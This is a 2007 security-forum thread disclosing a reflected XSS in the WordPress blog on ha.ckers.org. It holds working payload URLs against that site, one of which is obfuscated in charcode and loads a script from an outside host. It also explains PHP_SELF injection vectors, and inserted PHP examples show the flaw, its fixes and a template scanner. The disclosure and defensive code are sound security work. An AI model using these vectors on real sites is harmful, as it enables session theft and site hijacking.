Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 08, 2007 08:06AM

http://ha.ckers.org/blog/?"><script>alert(1)</script>

Click 'Previous Entries' and then it will fire... ;)

Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 08, 2007 08:18AM

Nice one! This way it works directly w/o user interaction:

http://ha.ckers.org/blog/?%22%3E%3Cscript%3Ealert(1)%3C/script%3E&paged=2

Greetings,
.mario

Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 08, 2007 08:22AM

Damn it... I was one-upped :P

...Can't believe I didn't think of doing that lol

Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 13, 2007 06:19PM

When will this be fiiiiiiiixed...

http://ha.ckers.org/blog/?%22%3E%3Cscript%3Ewith(location)with(hash)eval(substring(1))%3C/script%3E&paged=2#eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59%29%29

(of course it's not what it says - it's from kane and giorgio *g* )



Edited 2 time(s). Last edit at 07/13/2007 06:21PM by .mario.

Re: WordPress XSS (works on ha.ckers)
Date: July 14, 2007 02:36AM

hehe, this is one of the most obvious ways to find XSS, especially in PHP applications, and even more commonly found in WordPress templates.

The reason for these kinds of bugs is the inappropriate use of PHP_SELF... Most people use PHP_SELF to find a relative path to a resource, or to find the path to the current script.

So how do PHP_SELF exploits work? Well, attach the payload after the URL. For example:

http://example.com/"><script>alert(1)</script><!--

However, this may not work for reasons I don't want to discuss right now. I suggest using the full path to the script, like this:

http://example.com/index.php/"><script>alert(1)</script><!--

According to my XSS sampling, this technique works almost 60% of the time. However, don't try it only on the index page. Almost every page could be vulnerable. Here is another example:

http://example.com/contact/contact.php/"><script>alert(1)</script><!--

cheers

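The PHP_SELF pattern pdp describes, as an added example that is not code from the thread or from WordPress: a template that builds its form action from $_SERVER['PHP_SELF'], shown beside two ways of fixing it. The way PHP fills the request variables is general PHP behaviour: SCRIPT_NAME is the script the server resolved, PATH_INFO is the trailing "/..." segment after it, and PHP_SELF is SCRIPT_NAME followed by PATH_INFO, which is why the /index.php/"> form of the vector lands in PHP_SELF while the bare-root form often does not. REQUEST_URI carries the raw path and the query string, so the ?"><script> vectors at the top of the thread hit templates that reflect REQUEST_URI instead. The function names and the constructed $_SERVER array are my own.

```php
<?php
// Added example, not code from the thread or from WordPress. Shows a template
// that reflects $_SERVER['PHP_SELF'] into an attribute, and two fixes.

// Vulnerable: request-controlled string dropped straight into an attribute.
function form_vulnerable(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">'
         . '<input name="q"><input type="submit" value="Go"></form>';
}

// Fix 1: HTML-encode before output. ENT_QUOTES turns " into &quot;, so the
// attacker cannot close the attribute, and <script> becomes &lt;script&gt;.
function form_escaped(array $server): string
{
    $self = htmlspecialchars($server['PHP_SELF'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form action="' . $self . '" method="post">'
         . '<input name="q"><input type="submit" value="Go"></form>';
}

// Fix 2: don't reflect the request at all. SCRIPT_NAME carries no PATH_INFO
// segment. It is still encoded, as defence in depth.
function form_script_name(array $server): string
{
    $self = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form action="' . $self . '" method="post">'
         . '<input name="q"><input type="submit" value="Go"></form>';
}

// Constructed $_SERVER, as PHP populates it (after URL-decoding) for
//   GET /index.php/"><script>alert(1)</script><!--
// i.e. pdp's second vector. The trailing <!-- hides whatever the template
// emits after the injection point inside an HTML comment.
function attack_request(): array
{
    $payload = '/"><script>alert(1)</script><!--';
    return [
        'SCRIPT_NAME' => '/index.php',
        'PATH_INFO'   => $payload,
        'PHP_SELF'    => '/index.php' . $payload,
        'REQUEST_URI' => '/index.php' . $payload,
    ];
}

// True if the rendered HTML still contains a live <script> element.
function has_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

if (PHP_SAPI === 'cli') {
    $req = attack_request();
    foreach (['form_vulnerable', 'form_escaped', 'form_script_name'] as $fn) {
        $html = $fn($req);
        printf("%-17s %s  %s\n", $fn . ':', has_script_tag($html) ? 'XSS ' : 'safe', $html);
    }
}
```

Run it with php on the command line: only form_vulnerable renders an attribute that has been closed early followed by a real script element; the other two return a single form tag with the payload inert inside the quoted value. The same escaping rule applies to any other request-derived field (REQUEST_URI, PATH_INFO, QUERY_STRING) a template echoes into HTML.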
Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 14, 2007 03:32AM

You're right, pdp. Plus it's easy to find - just crawl the page, attach the vector to the url and create an image instead of using an alert :) Or egrep your code /templates for superglobal fields related to the path/URI.

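An added example, not code from the thread, that automates the second half of .mario's suggestion: walk a theme directory and flag lines where a request-derived $_SERVER field reaches an output statement without an escaping call on the same line. The list of risky fields, the accepted escaper names (esc_url, esc_attr and esc_html are WordPress helpers; the rest are core PHP), the regexes and the constructed sample templates are all my own choices, not a WordPress convention.

```php
<?php
// Added example, not code from the thread. A line-based grep for
// $_SERVER fields that are echoed without an escaping call.

const RISKY_FIELDS = ['PHP_SELF', 'REQUEST_URI', 'PATH_INFO', 'QUERY_STRING'];

// Escapers accepted as evidence the value was encoded before output.
const ESCAPERS = ['htmlspecialchars', 'htmlentities', 'rawurlencode', 'urlencode',
                  'esc_url', 'esc_attr', 'esc_html'];

// Returns [[line_no, field, line_text], ...] for each suspicious line.
function scan_template(string $source): array
{
    $fieldRe  = '/\$_SERVER\s*\[\s*[\'"](' . implode('|', RISKY_FIELDS) . ')[\'"]\s*\]/';
    $escRe    = '/\b(' . implode('|', ESCAPERS) . ')\s*\(/';
    $outputRe = '/\b(echo|print|printf)\b|<\?=/';
    $hits = [];
    foreach (explode("\n", $source) as $i => $line) {
        if (!preg_match($fieldRe, $line, $m)) continue;  // no risky field here
        if (!preg_match($outputRe, $line)) continue;     // not an output statement
        if (preg_match($escRe, $line)) continue;         // escaped on this line
        $hits[] = [$i + 1, $m[1], trim($line)];
    }
    return $hits;
}

// Walks a directory and scans every .php file in it.
function scan_theme(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
    foreach ($it as $file) {
        if ($file->getExtension() !== 'php') continue;
        foreach (scan_template(file_get_contents($file->getPathname())) as $hit) {
            $findings[] = array_merge([$file->getPathname()], $hit);
        }
    }
    return $findings;
}

// Constructed sample templates for a stand-alone run. nav.php passes the
// value through a variable first, which this single-line heuristic misses:
// a grep gives you the candidate lines, the data flow still has to be
// followed by hand.
const SAMPLE_TEMPLATES = [
    'header.php' => "<form action=\"<?php echo \$_SERVER['PHP_SELF']; ?>\">\n",
    'nav.php'    => "<?php \$next = \$_SERVER['REQUEST_URI'] . '&paged=2'; ?>\n"
                  . "<a href=\"<?php echo \$next; ?>\">Previous Entries</a>\n",
    'safe.php'   => "<form action=\"<?php echo htmlspecialchars(\$_SERVER['PHP_SELF'], ENT_QUOTES); ?>\">\n",
];

if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/theme-' . bin2hex(random_bytes(4));
    mkdir($dir);
    foreach (SAMPLE_TEMPLATES as $name => $src) {
        file_put_contents("$dir/$name", $src);
    }
    foreach (scan_theme($dir) as [$path, $lineNo, $field, $text]) {
        printf("%s:%d  %s  %s\n", basename($path), $lineNo, $field, $text);
    }
    foreach (array_keys(SAMPLE_TEMPLATES) as $name) {
        unlink("$dir/$name");
    }
    rmdir($dir);
}
```

Point scan_theme at a real wp-content/themes directory instead of the temporary one to use it for real. Every hit is a line to test with the path-info vector from pdp's post; a miss does not mean the template is clean, because the value may have travelled through a variable or a helper first.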
Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 14, 2007 07:10AM

Who's "giorgio *g*" ...? :S

And i'm quite surprised RSnake hasn't fixed this yet, he usually seems to be pretty quick when it comes to things like this :P

Re: WordPress XSS (works on ha.ckers)
Posted by: ma1
Date: July 14, 2007 08:08AM

kane_666 Wrote:
-------------------------------------------------------
> Who's "giorgio *g*" ...? :S

guess it's me, nice 2 meet u in the same XSS :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 14, 2007 08:32AM

lol you found that XSS as well? Awesome :P

Great minds think alike ;)

Re: WordPress XSS (works on ha.ckers)
Posted by: Anonymous User
Date: July 14, 2007 10:30AM

No - i meant the used vector. with()...

Re: WordPress XSS (works on ha.ckers)
Posted by: kane_666
Date: July 14, 2007 10:39AM

Ahh... Alright, I'm up to date. ;)

Re: WordPress XSS (works on ha.ckers)
Posted by: rsnake
Date: July 17, 2007 01:57PM

Sorry, I was out of town for two days with no access to email, or I would have followed up sooner. It should be fixed. Thanks for letting us know.

- RSnake
Gotta love it. http://ha.ckers.org
